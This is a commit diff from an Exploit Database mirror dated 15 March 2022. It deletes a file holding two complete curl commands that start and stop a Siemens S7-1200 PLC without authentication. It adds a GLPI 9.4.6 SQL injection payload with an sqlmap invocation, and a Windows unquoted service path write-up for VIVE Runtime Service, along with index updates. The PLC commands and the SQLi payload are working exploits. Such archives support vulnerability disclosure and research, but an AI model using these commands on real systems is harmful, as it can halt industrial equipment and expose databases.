DB: 2022-03-15
4 changes to exploits/shellcodes VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Baixar GLPI Project 9.4.6 - SQLi
This commit is contained in:
Offensive Security
parent
653f886e0b
commit
2ad6c86451
4 changed files with 43 additions and 17 deletions
|
|
@ -1,16 +0,0 @@
|
|||
# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command
|
||||
# Date: 09/03/2022
|
||||
# Exploit Author: RoseSecurity
|
||||
# Vendor Homepage: https://www.siemens.com/global/en.html
|
||||
# Version: V4.5 and below
|
||||
# Tested on: Siemens S7-1200 (CPU: 1215C)
|
||||
|
||||
# IP == PLC IP address
|
||||
|
||||
# Start Command
|
||||
|
||||
curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'
|
||||
|
||||
# Stop Command
|
||||
|
||||
curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'
|
||||
13
exploits/multiple/webapps/50823.txt
Normal file
13
exploits/multiple/webapps/50823.txt
Normal file
|
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
|
||||
# Date: 10/12
|
||||
# Exploit Author: Joas Antonio
|
||||
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
|
||||
# Software Link: https://glpi-project.org/pt-br/baixar/
|
||||
# Version: GLPI - 9.4.6
|
||||
# Tested on: Windows/Linux
|
||||
# CVE : CVE-2021-44617
|
||||
|
||||
#POC1:
|
||||
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111
|
||||
|
||||
sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
|
||||
28
exploits/windows/local/50824.txt
Normal file
28
exploits/windows/local/50824.txt
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path
|
||||
# Date: 11/03/2022
|
||||
# Exploit Author: Faisal Alasmari
|
||||
# Vendor Homepage: https://www.vive.com/
|
||||
# Software Link: https://developer.vive.com/resources/downloads/
|
||||
# Version: 1.0.0.4
|
||||
# Tested: Windows 10 x64
|
||||
|
||||
|
||||
|
||||
C:\Users\User>sc qc "VIVE Runtime Service"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: VIVE Runtime Service
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : VIVE Runtime Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
#Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
|
||||
|
|
@ -11471,6 +11471,7 @@ id,file,description,date,author,type,platform,port
|
|||
50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
|
||||
50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
||||
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
|
||||
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -18646,7 +18647,6 @@ id,file,description,date,author,type,platform,port
|
|||
50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
|
||||
50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
|
||||
50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
|
||||
50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
|
||||
50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
|
||||
50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
|
||||
|
|
@ -44892,3 +44892,4 @@ id,file,description,date,author,type,platform,port
|
|||
50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
|
||||
50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,
|
||||
50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,
|
||||
50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue